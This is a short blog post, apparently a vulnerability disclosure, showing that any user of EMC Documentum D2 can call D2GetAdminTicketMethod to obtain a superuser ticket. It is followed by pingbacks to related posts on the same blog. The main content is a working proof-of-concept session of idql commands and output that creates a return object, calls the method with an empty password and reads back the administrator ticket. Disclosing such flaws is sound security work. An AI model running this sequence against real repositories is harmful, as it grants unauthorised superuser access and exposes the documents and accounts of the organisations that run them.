documentum security vulnerabilities: D2GetAdminTicketMethod (D2)

Any user is able to execute D2GetAdminTicketMethod to get superuser’s ticket:

1> create c6_method_return object set message='test'
2> go
object_created
--------------
00002ee280000e9b
(1 row affected)
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d2 -password "" -method_return_id 00002ee280000e9b'
3> go
...
(1 row affected)
1> select message from c6_method_return where r_object_id='00002ee280000e9b'
2> go
message
--------------
DM_TICKET=T0.....
(1 row affected)

5 thoughts on “documentum security vulnerabilities: D2GetAdminTicketMethod (D2)

  1. Pingback: God bless EMC. Part IV | Documentum in a (nuts)HELL
  2. Pingback: Is it worth to treat flu if patient has cancer? | Documentum in a (nuts)HELL
  3. Pingback: CVE-2014-2515 (D2GetAdminTicketMethod). Was it really fixed? | Documentum in a (nuts)HELL
  4. Pingback: Is it possible to compromise Documentum by deleting object? Typical mistakes | Documentum in a (nuts)HELL
  5. Pingback: Say goodbuy LockBox. Part II | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s